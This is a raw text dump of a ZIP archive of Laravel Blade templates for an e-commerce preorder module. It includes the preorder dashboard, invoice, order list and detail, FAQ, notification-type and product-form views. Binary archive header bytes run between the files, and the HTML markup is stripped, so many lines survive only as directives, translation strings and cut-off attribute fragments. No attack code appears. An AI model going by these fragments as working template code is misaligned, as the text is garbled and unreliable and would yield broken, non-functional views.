    {{$final_preorder_request_count}}

    {{-- Preorder by Product --}}

    {{ translate('Preorder by Product')}}

    {{ translate('View preorders of the product by order number') }}

    @endsection @section('script') @include('backend.dashboard.dashboard_js') @endsectionPK�N]G�� � Gviews/preorder/backend/dashboard/preorder_by_products_section.blade.phpnu�[���
    @foreach($preorderProducts as $row) @php $product = \App\Models\PreorderProduct::where('id', $row['id'])->first(); $product_url = route('preorder-product.details', $product->product_slug); @endphp @endforeach
    {{ translate('Product') }} {{ translate('Request') }} {{ translate('Prepayment') }} {{ translate('Final Order') }} {{ translate('Total Sold') }}
    {{ $product->preorder->where('request_preorder_status',1)->count() }} {{ $product->preorder->where('prepayment_confirm_status',1)->count() }} {{ $product->preorder->where('final_order_status',1)->count() }} {{ $product->preorder->where('delivery_status',2)->where('refund_status','!=' ,2)->count() }}
    PK�N]�B��t t *views/preorder/backend/faqs/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('FAQ Information')}}
    @csrf
    @endsection PK�N] ���>>+views/preorder/backend/faqs/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate("All FAQ's")}}


    {{ translate('All FAQ') }}
    @foreach($faqs as $key => $faq) @endforeach
    # {{translate('Question')}} {{translate('Status')}} {{translate('Options')}}
    {{ ($key+1) + ($faqs->currentPage() - 1)*$faqs->perPage() }} {{ $faq->getTranslation('question')}} @can('edit_faq') @endcan @can('delete_faq') @endcan
    {{ $faqs->appends(request()->input())->links() }}
    @can('add_faq')
    {{ translate('Add New FAQ') }}
    @csrf
    @endcan
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]<��::1views/preorder/backend/invoices/invoice.blade.phpnu�[��� {{ translate('INVOICE') }}
    @php $logo = get_setting('header_logo'); $shipping_address = json_decode($order->address); @endphp
    @if($logo != null) @else @endif {{ translate('INVOICE') }}
    {{ get_setting('site_name') }}
    {{ get_setting('contact_address') }}
    {{ translate('Email') }}: {{ get_setting('contact_email') }}
    {{ translate('Phone') }}: {{ get_setting('contact_phone') }}

    {{ translate('Sold By') }}:
    {{ $order->shop->name ?? get_setting('site_name') }}
    {{ get_seller_address($order) }}

    @php $gstin = get_seller_gstin($order); @endphp
    @if($gstin != null && is_numeric($order->gst_amount)) {{ translate('GSTIN') }}: {{ $gstin }} @endif

    {{ translate('Payment method') }}: {{ preorder_payment_type($order) }}
    {{ translate('Delivery Type') }}: @if ($order->delivery_type != null && $order->delivery_type == 'home_delivery') {{ translate('Home Delivery') }} @elseif ($order->delivery_type == 'pickup_point') @if ($order->pickup_point != null) {{ $order->pickup_point->getTranslation('name') }} ({{ translate('Pickup Point') }}) @else {{ translate('Pickup Point') }} @endif @elseif ($order->delivery_type == 'carrier') @if ($order->carrier != null) {{ $order->carrier->name }} ({{ translate('Carrier') }})
    {{ translate('Transit Time').' - '.$order->carrier->transit_time }} @else {{ translate('Carrier') }} @endif @else {{ translate('N/A') }} @endif
    {{ translate('Order ID') }}: {{ $order->order_code }}
    {{ translate('Order Date') }}: {{ date('d-m-Y', $order->date) }}
    {{ translate('Bill to') }}:
    {{ $order->user->name }}
    {{ $order->address?->address ?? '' }}, {{ $order->address?->city?->name ?? '' }}, {{ $order->address?->state->name ?? '' }}, {{ $order->address?->country->name ?? '' }}
    {{ translate('Email') }}: {{ $order->address?->email ?? $order->user->email}}
    {{ translate('Phone') }}: {{ $order->address?->phone }}

    {{ translate('Ship to') }}:
    {{ $order->user->name }}
    {{ $order->address?->address ?? '' }}, {{ $order->address?->city?->name ?? '' }}, {{ $order->address?->state->name ?? '' }}, {{ $order->address?->country->name ?? '' }}
    {{ translate('Email') }}: {{ $order->address?->email ?? $order->user->email}}
    {{ translate('Phone') }}: {{ $order->address?->phone }}
    @if(is_numeric($order->gst_amount)) @if($order->address_id && preorder_same_state_shipping($order)) @elseif($order->address_id) @else @endif @else @endif @if ($order->preorder_product != null) @if(is_numeric($order->gst_amount)) @php $gst_amount = get_gst_by_price_and_rate($order->subtotal, $order->gst_rate); $shipping_gst = get_gst_by_price_and_rate($order->shipping_cost, $order->gst_rate); @endphp @if($order->address_id) @if(preorder_same_state_shipping($order)) @else @endif @else @endif @else @endif @if(is_numeric($order->gst_amount)) @else @endif @if(is_numeric($order->gst_amount)) @if($order->address_id) @if(preorder_same_state_shipping($order)) @else @endif @else @endif @endif @endif
    {{ translate('Product Name') }} {{ translate('Qty') }}{{ translate('Gross Amount')}} {{ translate('Discount/ Coupon')}} {{ translate('Taxable Value')}}{{ translate('CGST') }} {{ translate('SGST') }}{{ translate('IGST') }}{{ translate('GST') }}{{ translate('Unit Price') }} {{ translate('Tax') }}{{ translate('Total') }}
    {{ $order->preorder_product->product_name }} @if($order->preorder_product->variation != null) ({{ $order->preorder_product->variation }}) @endif
    {{translate('SKU')}}: {{ $order->preorder_product->sku ?? 'N/A' }}
    {{ $order->quantity }} {{ single_price($order->unit_price * $order->quantity) }} {{ single_price($order->coupon_discount + $order->product_discount) }} {{ single_price($order->subtotal) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount) }} {{ single_price($gst_amount) }}{{ single_price($order->preorder_product->unit_price) }} {{ single_price($order->tax) }}{{ single_price($order->subtotal + $gst_amount) }}{{ single_price($order->unit_price * $order->quantity) }}
    {{translate('Shipping')}} 1 {{ single_price($order->shipping_cost) }} {{ single_price(0) }} {{ single_price($order->shipping_cost) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst) }} {{ single_price($shipping_gst) }} {{ single_price($order->shipping_cost + $shipping_gst) }}
    @php $removedXML = ''; @endphp {!! str_replace($removedXML,"", QrCode::size(100)->generate($order->order_code)) !!} @if(is_numeric($order->gst_amount)) @else @if($order->is_coupon_applied) @endif @endif @if($order->prepayment !== null) @endif
    {{ translate('Sub Total') }} {{ single_price($order->subtotal + $order->shipping_cost) }}
    {{ translate('Total GST') }} {{ single_price($order->gst_amount) }}
    {{ translate('Sub Total') }} {{ single_price($order->unit_price * $order->quantity) }}
    {{ translate('Shipping Cost') }} {{ single_price($order->shipping_cost) }}
    {{ translate('Total Tax') }} {{ single_price($order->tax) }}
    {{ translate('Coupon Discount') }} {{ single_price($order->coupon_discount) }}
    {{ translate('Product Discount') }} {{ single_price($order->product_discount) }}
    {{ translate('Grand Total') }} {{ single_price($order->grand_total) }}
    {{ translate('Prepayment') }} {{ single_price($order->prepayment) }}
    {{ translate($order->final_order_status != 2 ? 'Remaining' : 'Final Payment') }} {{ single_price($order->grand_total - $order->prepayment) }}
    @if($order->shipping_note != null)

    {{translate('Shipping Note')}}:

    {{$order->shipping_note}}

    @endif
    PK�N]��j���8views/preorder/backend/notification_types/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Notification Type Information') }}
    @csrf @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @if ($notificationType->type != 'custom') {{ translate('N.B : Do Not Change The Variables Like') }} [[ ____ ]] @endif {{ translate('N.B : Use character, number only') }}
    @endsection PK�N]T����9views/preorder/backend/notification_types/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Notification Types') }}

    {{ translate('Notification Types') }}

    @php $activeClasss = 'btn-soft-blue'; $inActiveClasses = 'text-secondary border-dashed border-soft-light'; @endphp {{ translate('Customer') }} {{ translate('Seller') }} {{ translate('Admin') }}
    @foreach ($notificationTypes as $key => $notificationType) @endforeach
    # {{ translate('Image') }} {{ translate('Type') }} {{ translate('DEfault Text') }} {{ translate('Status') }} {{ translate('Actions') }}
    {{ ($key+1) + ($notificationTypes->currentPage() - 1)*$notificationTypes->perPage() }} {{ translate('Image') }} {{ $notificationType->getTranslation('name') }} {{ $notificationType->getTranslation('default_text') }} @can('edit_preorder_notification_type') @endcan
    {{ $notificationTypes->appends(request()->input())->links() }}
    @endsection @section('script') @endsection PK�N]�.5��X�X-views/preorder/backend/orders/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php $routeName = Route::currentRouteName(); @endphp
    {{ translate('All Preorders') }}
    @if (auth()->user()->can('delete_preorder')) @else @endif @if($routeName != 'inhouse_preorder.list') @endif @if (addon_is_activated('refund_request')) @endif @foreach ($orders as $key => $order) @if (auth()->user()->can('delete_preorder') || auth()->user()->can('export_order')) @else @endif @if($routeName != 'inhouse_preorder.list') @endif @if (addon_is_activated('refund_request')) @endif @endforeach
    #{{ translate('Product/Quantity') }} {{ translate('Preorder Code').'/'.translate('Created') }} {{ translate('Price').'/'.translate('Prepayment') }}{{ translate('Seller') }}{{ translate('Customer') }} {{ translate('Status') }}{{ translate('Refund') }}{{ translate('options') }}
    {{ $key + 1 + ($orders->currentPage() - 1) * $orders->perPage() }}
    {{ translate('category')}}
    {{ Str::limit($order->preorder_product?->getTranslation('product_name'), 50, ' ...') }}
    {{ translate('QTY') }} : {{ $order->quantity }}
    {{ $order->order_code }} @if ($order->is_viewed == 0) {{ translate('New') }} @endif
    {{ translate('Created') }} : {{ $order->created_at }}
    {{ single_price($order->grand_total) }}/ {{ single_price($order->preorder_product?->is_prepayment ? $order->preorder_product->preorder_prepayment?->prepayment_amount : 0)}} {{ $order->product_owner == 'admin' ? env('APP_NAME') : ( $order?->shop->name ?? $order->product_owner)}} @if($order->user != null) {{ $order->user->name }}
    {{ $order->user->email ?? $order->user->phone }} @else {{ translate('Customer not found') }} @endif
    @if($order->refund_status == 2) {{ translate('Refunded')}} @elseif($order->delivery_status == 2) {{ translate('Delivered')}} @elseif($order->shipping_status == 2) {{ translate('In Shipping')}} @elseif($order->final_order_status == 1) {{ translate('Final Order Requested')}} @elseif($order->final_order_status == 2) {{ translate('Final Order Accepted')}} @elseif($order->final_order_status == 3) {{ translate('Final Order Cancelled')}} @elseif($order->prepayment_confirm_status == 1) {{ translate('Prepayment Requested')}} @elseif($order->prepayment_confirm_status == 2) {{ translate('Prepayment Accepted')}} @elseif($order->prepayment_confirm_status == 3) {{ translate('Prepayment Cancelled')}} @elseif($order->request_preorder_status == 1) {{ translate('Preorder Requested')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Accepted')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Cancelled')}} @endif @if($order->preorder_product?->is_refundable == 1) {{ translate('Refundable')}} @else {{ translate('No Refund')}} @endif @can('view_preorder_details') @endcan @can('download_preorder_invoice') @endcan @if((($routeName == 'delayed_prepayment_preorders.list' && auth()->user()->can('delayed_prepayment_preorder_notification_send')) || ($routeName == 'delayed_final_orders.list' && auth()->user()->can('final_preorder_notification_send'))) && $canSendNotification) @endif @can('delete_preorder') @endcan
    {{ $orders->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') {{-- Bulk Prepayment/Final Order Notification --}} @endsection @section('script') @endsectionPK�N]bv0A��,views/preorder/backend/orders/show.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Order') }} #{{$order?->order_code}}

    {{\Carbon\Carbon::parse($order->created_at)->format('d.m.Y')}} at {{\Carbon\Carbon::parse($order->created_at)->format(' h.i A')}}

    {{ translate('Seller') }} {{$order->preorder_product->user->shop != null ? $order->preorder_product->user->shop->name : translate('In-house Product')}}

    @php $removedXML = ' '; @endphp {!! str_replace($removedXML, '', QrCode::size(100)->generate($order->order_code ?? "JKHKJHJHJG65")) !!}

    {{ translate('Order Status') }}

    @if($order->delivery_status == 2) {{ translate('Delivered')}} @elseif($order->shipping_status == 2) {{ translate('In Shipping')}} @elseif($order->final_order_status == 1) {{ translate('Final Order Requested')}} @elseif($order->final_order_status == 2) {{ translate('Final Order Accepted')}} @elseif($order->final_order_status == 3) {{ translate('Final Order Cancelled')}} @elseif($order->prepayment_confirm_status == 1) {{ translate('Prepayment Requested')}} @elseif($order->prepayment_confirm_status == 2) {{ translate('Prepayment Accepted')}} @elseif($order->prepayment_confirm_status == 3) {{ translate('Prepayment Cancelled')}} @elseif($order->request_preorder_status == 1) {{ translate('Preorder Requested')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Accepted')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Cancelled')}} @endif

    {{ translate('Amount') }}

    {{format_price($order->subtotal)}}

    {{ translate('Prepay') }} {{format_price($order->prepayment)}}

    {{$order->user?->name}}

    {{$order->user?->email}}
    {{$order->user?->phone}}

    {{$order->address?->address}}

    {{ translate('customer') }}

    {{ translate('Product') }}

    {{$order->preorder_product->product_name}}

    {{ translate('Quantity') }}

    {{$order->quantity}} {{$order->preorder_product->unit}}

    {{ translate('Product Details') }}

    {{ translate('UNIT Price') }}

    {{format_price($order->preorder_product->unit_price)}}

    {{ translate('Price') }}

    {{format_price($order->subtotal)}}

    {{ translate('Request Preorder') }}

    {{ $order->request_preorder_time != null ? \Carbon\Carbon::parse($order->request_preorder_time)->format('d.m.Y \a\t h.i A') : ''}}

    @csrf @method('PUT')
    @if($order->request_note)

    {{translate('Notes')}}

    {{$order->request_note}}

    @endif
    @if($order->product_owner == 'admin')
    @php $requestPreorderStatus = $order->request_preorder_status; @endphp @if(in_array($requestPreorderStatus, [2, 3]))
    @elseif($requestPreorderStatus == 1 && auth()->user()->can('update_preorder_status'))
    @else
    @endif
    @endif
    @if($order->preorder_product->is_prepayment)
    {{ translate('Prepayment Request') }}

    {{ $order->prepayment_confirmation_time != null ? \Carbon\Carbon::parse($order->prepayment_confirmation_time)->format('d.m.Y \a\t h.i A') : ''}}

    @csrf @method('PUT')

    {{translate('Proof of payment')}}

    {{translate('Reference No.')}}

    {{translate('Notes')}}

    {{$order->reference_no}}

    {{$order->confirm_note}}

    @if($order->prepayment_confirm_status == 1)
    @endif @if($order->prepayment_note)

    {{ $order->prepayment_note }}

    @endif
    @if($order->product_owner == 'admin')
    @if($order->prepayment_confirm_status == 2 )
    @elseif($order->prepayment_confirm_status == 3 )
    @elseif($order->prepayment_confirm_status == 1 && $order->request_preorder_status == 2 && auth()->user()->can('update_preorder_status'))
    @else
    @endif
    @endif
    @endif
    {{ translate('Final Preorder') }}

    {{ $order->final_order_time != null ? \Carbon\Carbon::parse($order->final_order_time)->format('d.m.Y \a\t h.i A') : '' }}

    @csrf @method('PUT')
    @if($order->cod_for_final_order)

    {{translate('Payment Type')}}

    @else

    {{translate('Proof of payment')}}

    {{translate('Reference No.')}}

    @endif

    {{translate('Notes')}}

    @if($order->cod_for_final_order)

    {{translate('Cash on delivery')}}

    @else

    {{$order->final_payment_reference_no}}

    @endif

    {{$order->final_payment_confirm_note}}

    @if($order->final_order_status == 1)
    @endif @if($order->final_oder_note)

    {{ $order->final_oder_note }}

    @endif
    @if($order->product_owner == 'admin')
    @if($order->final_order_status == 2 )
    @elseif($order->final_order_status == 3 )
    @elseif($order->final_order_status == 1 && ($order->prepayment_confirm_status == 2 ) && auth()->user()->can('update_preorder_status'))
    @else
    @endif
    @endif
    {{ translate('In Shipping') }}

    {{ $order->shipping_time != null ? \Carbon\Carbon::parse($order->shipping_time)->format('d.m.Y \a\t h.i A') : '' }}

    @csrf @method('PUT')
    @if(!in_array($order->shipping_status, [2, 3]))
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endif
    @if(!in_array($order->shipping_status, [2, 3]))
    @endif @if($order->shipping_note)

    {{ $order->shipping_note }}

    @endif
    @if($order->product_owner == 'admin')
    {{-- button --}} @if($order->shipping_status == 2 )
    @elseif($order->shipping_status == 3 )
    @elseif($order->shipping_status == 0 && ($order->final_order_status == 2) && auth()->user()->can('update_preorder_status'))
    @endif
    @endif
    {{ translate('Delivery') }}

    {{ $order->delivery_time != null ? \Carbon\Carbon::parse($order->delivery_time)->format('d.m.Y \a\t h.i A') : '' }}

    @csrf @method('PUT')
    @if($order->cod_for_final_order)

    {{translate('Payment Type')}}

    @else

    {{translate('Proof of payment')}}

    {{translate('Reference No.')}}

    @endif

    {{translate('Notes')}}

    @if($order->cod_for_final_order)

    {{translate('Cash on delivery')}}

    @else

    {{$order->final_payment_reference_no}}

    @endif

    {{$order->final_payment_confirm_note}}

    @if(!in_array($order->delivery_status, [2, 3]))
    @endif @if($order->delivery_note)

    {{ $order->delivery_note }}

    @endif
    @if($order->product_owner == 'admin')
    {{-- button --}} @if($order->delivery_status == 2)
    @elseif($order->delivery_status == 3)
    @elseif($order->shipping_status == 2) @can('update_preorder_status')
    @endcan @endif
    @endif
    @if($order->preorder_product->is_refundable && $order->delivery_status==2)
    {{ translate('Refund') }} @if($order->refund_status == 2) {{ translate('Accepted')}} @elseif($order->refund_status == 3) {{ translate('Rejected')}} @endif

    {{ $order->refund_time != null ? \Carbon\Carbon::parse($order->refund_time)->format('d.m.Y \a\t h.i A') : '' }}

    @csrf @method('PUT')

    {{translate('Proof of refund')}}

    {{translate('Notes')}}

    {{$order->refund_note}}

    @if(!in_array($order->refund_status, [2, 3]))
    @endif @if($order->seller_refund_note)

    {{ $order->seller_refund_note }}

    @endif
    @if($order->product_owner == 'admin')
    {{-- button --}} @if($order->refund_status == 2 )
    @elseif($order->refund_status == 3 )
    @elseif($order->refund_status == 1 && ($order->delivery_status == 2) && auth()->user()->can('update_preorder_status'))
    @else
    @endif
    @endif
    @endif

    {{translate('Order Summary')}}

    @include('preorder.common.order.order_summary')

    {{translate('Preorder Status')}}

    {{translate('Requested Pre order')}} {{ $order->request_preorder_time != null ? \Carbon\Carbon::parse($order->request_preorder_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Pre order request accepted')}} {{$order->request_preorder_time != null ? \Carbon\Carbon::parse($order->request_preorder_time)->format('H:i \h\r\s, j F, Y') : ''}}
    @if($order->preorder_product?->is_prepayment)
    {{translate('Prepayment confirmation')}} {{$order->prepayment_confirmation_time != null ? \Carbon\Carbon::parse($order->prepayment_confirmation_time)->format('H:i \h\r\s, j F, Y') : ''}}
    @endif
    {{translate('Order confirmed')}} {{$order->prepayment_confirmation_time != null ? \Carbon\Carbon::parse($order->prepayment_confirmation_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Product is live')}}
    {{translate('Final order ')}} {{$order->final_order_time != null ? \Carbon\Carbon::parse($order->final_order_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Product In Shipping')}} {{$order->shipping_time != null ? \Carbon\Carbon::parse($order->shipping_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Product Delivered')}} {{$order->delivery_time != null ? \Carbon\Carbon::parse($order->delivery_time)->format('H:i \h\r\s, j F, Y') : ''}}
    @endsection @section('modal') @section('modal') {{-- customer ban modal --}} {{-- customer suspicious modal --}} {{-- customer History modal --}} @include('preorder.common.models.preorder_cormation') @endsection @endsection @section('script') @endsectionPK�N]ӱ���\�\*views/preorder/backend/products/backup.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    {{translate('Add New Product')}}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{translate('Product Information')}}
    {{translate('Product Files & Media')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product details page gallery. Use 600x600 sizes images.')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('This image is visible in all product box. Use 300x300 sizes image. Keep some blank space around main object of your image as we had to crop some edge in different devices to make it responsive.')}}
    {{translate("Use proper link without extra parameter. Don't use short share link/embeded iframe code.")}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Product Description')}}
    {{translate('Product Price & Discounts')}}
    {{translate('Select this option if the price is fixed')}}
    {{translate('Select if the price is variable i.e: $99.99 to $119.99')}}
    {{translate('Publish price later')}}
    {{translate('In the place of price there will be a sticker Call for Price')}}

    {{translate('Select this option if the Prepayment amount is fixed')}}
    {{translate('Select if the Prepayment is only for Cash On Delivery')}}

    {{translate('Select this option if the sample price is fixed')}}
    {{translate('In the place of sample price there will be a sticker Call for sample Price')}}



    {{translate('Use for Direct Discount on this order')}}
    {{translate('Coupon Code will only provide Free Delivery')}}
    {{translate('Use for other orders of this seller after final order')}}
    {{translate('Assign a coupon code from the system')}}
    {{translate('Specify the benefits you want to give to customers')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('SEO Meta Tags')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{-- Right side --}}
    {{translate('Product Settings')}}
    {{translate('Refund')}}
    {{translate('Club Point')}}
    {{translate('Shipping')}}
    {{translate('Shipping Configuration')}}
    {{translate('Estimated Shipping Time')}}
    {{translate('Days')}}
    {{translate('Cash On Delivery')}}
    {{translate('VAT & Tax')}}
    @foreach($taxes as $tax)
    @endforeach
    {{translate('Stock & Order Display Settings')}}

    {{translate('Current Stock')}}

    {{translate('More Products to Preorder')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    @foreach(\App\Models\Product::take(5)->get() as $product) @endforeach

    {{ translate('Image')}}

    {{$product->name}}

    {{single_price($product->unit_price)}}
    {{$product->categories->first()->name}}
    {{translate('Frequently Bought Products')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    {{-- Select Category for Frequently Bought Product --}}
    @endsection @section('modal') @include('modals.product_select_modal') @endsection @section('script') @endsection PK�N]u��*����0views/preorder/backend/products/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    {{translate('Add New Product')}}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{translate('Product Information')}}
    {{-- Product Name --}}
    {{translate('Enter a descriptive name for the product. [e.g. "Wireless Bluetooth Headphones"]')}}
    {{ translate('Choose the product\'s brand from the list. [e.g. "Sony"]') }}
    {{translate('Specify the unit of measurement for the product. [e.g. "Piece" or "kg"]')}}
    {{-- Tags --}}
    {{translate('Add keywords to help customers find this product. [e.g. "wireless, headphones, audio"]')}}
    {{-- Barcode --}} @if (addon_is_activated('pos_system'))
    {{translate('Enter the product’s barcode or SKU for inventory tracking. [e.g. "1234567890123"]')}}
    @endif
    {{translate('Product Files & Media')}}
    {{-- Gallery Image --}}
    {{translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload multiple images, each 600x400 pixels. [e.g. Images showing products from different angles.]')}}
    {{-- Thumbnail Image --}}
    {{translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload a primary image at 300x200 pixels for quick preview. [e.g. A front view of the product.]')}}
    {{-- Video Provider --}}
    {{translate('Select the video platform hosting the product video. [e.g. "YouTube"]')}}
    {{-- Video Link --}}
    {{ translate('Provide the link to the product video. [e.g. "https://www.youtube.com/watch?v=12345"]') }}
    {{translate('Product Description')}}
    {{translate('Write a detailed overview of the product, including features. [e.g. "These wireless Bluetooth headphones offer premium sound quality, noise cancellation, and a comfortable design for all-day use."]')}}
    {{translate('Product Price & Discounts')}}
    {{translate('Enter the price per unit. [e.g. "$49.99"]')}}


    {{translate('Choose start and end dates for a discount period. [e.g. "01/01/2024 - 01/15/2024"]')}}
    {{translate('Specify the discount percentage or amount. [e.g. "10%" or "$5.00"]')}}

    {{translate('SEO Meta Tags')}}
    {{translate('Add a title for SEO purposes to improve search visibility. [e.g. "Premium Wireless Bluetooth Headphones"]')}}
    {{translate('Provide a short SEO-friendly description. [e.g. "High-quality Bluetooth headphones with noise cancellation."]')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload an image that represents the product in search engines. [e.g. A high-resolution image of the product.]')}}
    {{-- Right side --}}
    {{-- Categories --}}
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    {{translate('Product Settings')}}
    {{translate('Upload an image that represents the product in search engines. [e.g. A high-resolution image of the product.]')}}
    {{translate('Toggle to mark this product as featured on the platform.')}}
    {{translate('Indicate if the product is in stock and ready to ship.')}}
    {{translate('Set a date when the product will become available. Example: "01/20/2024"')}}
    @if (addon_is_activated('refund_request'))
    {{translate('Refund')}}
    @endif
    {{translate('Shipping')}}
    {{translate('Shipping Configuration')}}
    {{translate('Cash On Delivery')}}
    @if (addon_is_activated('gst_system'))
    {{translate('HSN & GST')}}
    {{translate('Harmonized System Nomenclature (HSN) code for tax purposes. [e.g. "8517"]')}}
    {{translate('Goods and Services Tax (GST) rate percentage for this product. [e.g. "18%"]')}}
    @else
    {{translate('VAT & Tax')}}
    @foreach($taxes as $tax)
    {{translate('Enter the vat & tax rate percentage for this product. [e.g. "8%"]')}}
    @endforeach
    @endif
    {{translate('More Products to Preorder')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    {{translate('Frequently Bought Products')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    {{-- Select Category for Frequently Bought Product --}}
    @endsection @section('modal') @include('modals.product_select_modal') {{-- Pre Order Product Select Model --}} @include('preorder.common.models.pre_order_product_select_modal') {{-- Note Modal --}} @include('modals.note_modal') @endsection @section('script') @endsectionPK�N]�O�/�7�7.views/preorder/backend/products/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    {{translate('Update Product Information')}}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf @method('PUT')
    {{-- Product Name --}}
    {{translate('Enter a descriptive name for the product. [e.g. "Wireless Bluetooth Headphones"]')}}
    {{-- Brand --}}
    {{ translate('Choose the product\'s brand from the list. [e.g. "Sony"]') }}
    {{-- Unit --}}
    {{translate('Specify the unit of measurement for the product. [e.g. "Piece" or "kg"]')}}
    {{-- Minimum Purchase Qty --}} {{-- Tags --}}
    {{translate('Add keywords to help customers find this product. [e.g. "wireless, headphones, audio"]')}}
    {{-- Barcode --}} @if (addon_is_activated('pos_system'))
    {{translate('Enter the product’s barcode or SKU for inventory tracking. [e.g. "1234567890123"]')}}
    @endif
    {{translate('Product Files & Media')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload multiple images, each 600x400 pixels. [e.g. Images showing products from different angles.]')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload a primary image at 300x300 pixels for quick preview. [e.g. A front view of the product.]')}}
    {{translate('Select the video platform hosting the product video. [e.g. "YouTube"]')}}
    {{ translate('Provide the link to the product video. [e.g. "https://www.youtube.com/watch?v=12345"]') }}
    {{translate('Product Description')}}
    {{translate('Write a detailed overview of the product, including features. [e.g. "These wireless Bluetooth headphones offer premium sound quality, noise cancellation, and a comfortable design for all-day use."]')}}
    {{translate('Product Price & Discounts')}}
    {{translate('Enter the price per unit. [e.g. "$49.99"]')}}

    {{translate('Specify the required prepayment amount for pre-orders. [e.g. "$10.00"]')}}

    @php $start_date = date('d-m-Y H:i:s', $product->discount_start_date); $end_date = date('d-m-Y H:i:s', $product->discount_end_date); @endphp
    discount_start_date && $product->discount_end_date) value="{{ $start_date.' to '.$end_date }}" @endif placeholder="{{translate('Select Date')}}" data-time-picker="true" data-format="DD-MM-Y HH:mm:ss" data-separator=" to " autocomplete="off"> {{translate('Choose start and end dates for a discount period. [e.g. "01/01/2024 - 01/15/2024"]')}}
    {{translate('Specify the discount percentage or amount. [e.g. "10%" or "$5.00"]')}}

    {{translate('Generate ')}}
    @php $start_date = date('d-m-Y H:i:s', $coupon?->coupon_start_date); $end_date = date('d-m-Y H:i:s', $coupon?->coupon_end_date); @endphp
    coupon_start_date && $coupon?->coupon_end_date) value="{{ $start_date.' to '.$end_date }}" @endif placeholder="{{translate('Select Date')}}" data-time-picker="true" data-format="DD-MM-Y HH:mm:ss" data-separator=" to " autocomplete="off"> {{translate('Choose start and end dates for a coupon discount period. [e.g. "01/01/2024 - 01/15/2024"]')}}
    {{translate('Specify the coupon amount percentage or amount. [e.g. "10%" or "$5.00"]')}}
    {{translate('SEO Meta Tags')}}
    {{translate('Add a title for SEO purposes to improve search visibility. [e.g. "Premium Wireless Bluetooth Headphones"]')}}
    {{translate('Provide a short SEO-friendly description. [e.g. "High-quality Bluetooth headphones with noise cancellation."]')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Upload an image that represents the product in search engines. [e.g. A high-resolution image of the product.]')}}
    {{-- Right side --}}
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
    @php $old_categories = $product->categories()->pluck('category_id')->toArray(); @endphp
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    {{translate('Product Settings')}}
    {{translate('Upload an image that represents the product in search engines. [e.g. A high-resolution image of the product.]')}}
    {{translate('Toggle to mark this product as featured on the platform.')}}
    {{translate('Indicate if the product is in stock and ready to ship.')}}
    {{translate('Set a date when the product will become available. Example: "01/20/2024"')}}
    @if (addon_is_activated('refund_request'))
    {{translate('Refund')}}
    show_refund_note == 1 ? 'checked' : '' }}>
    @if($refund?->note != null)
    {{ $refund->note->getTranslation('description') ?? '' }}
    @endif
    @endif
    {{translate('Shipping')}}
    {{translate('Shipping Configuration')}}
